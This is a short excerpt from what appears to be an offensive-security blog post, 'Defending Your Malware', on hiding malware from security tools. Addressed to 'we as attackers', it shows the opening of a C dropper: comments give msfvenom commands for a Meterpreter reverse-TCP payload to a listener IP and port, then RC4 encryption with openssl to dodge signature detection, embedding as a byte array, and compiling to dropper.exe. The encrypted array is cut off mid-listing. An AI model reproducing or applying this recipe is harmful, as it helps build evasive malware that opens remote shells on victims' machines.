Malware is an important part of an engagement, though as many security solutions are now evolving past rudimentary signature comparisons to using more advanced techniques to detect malicious activity, it is important that we as attackers understand the methods they are using and how we can avoid them. Consider the following code I wrote for example. #include <stdio.h> #include <windows.h> #include <wincrypt.h> #include <tlhelp32.h> /****************************************************************************************************/ // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.239 LPORT=4444 -f raw -o meter.bin // cat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.bin // xxd -i encmeter.bin // x86_64-w64-mingw32-gcc dropper.c -o dropper.exe unsigned char encmeter_bin[] = { 0x6e, 0xdc, 0x5b, 0x2a, 0x59, 0xba, 0x87, 0x64, 0x3e,...
Defending Your Malware
read more
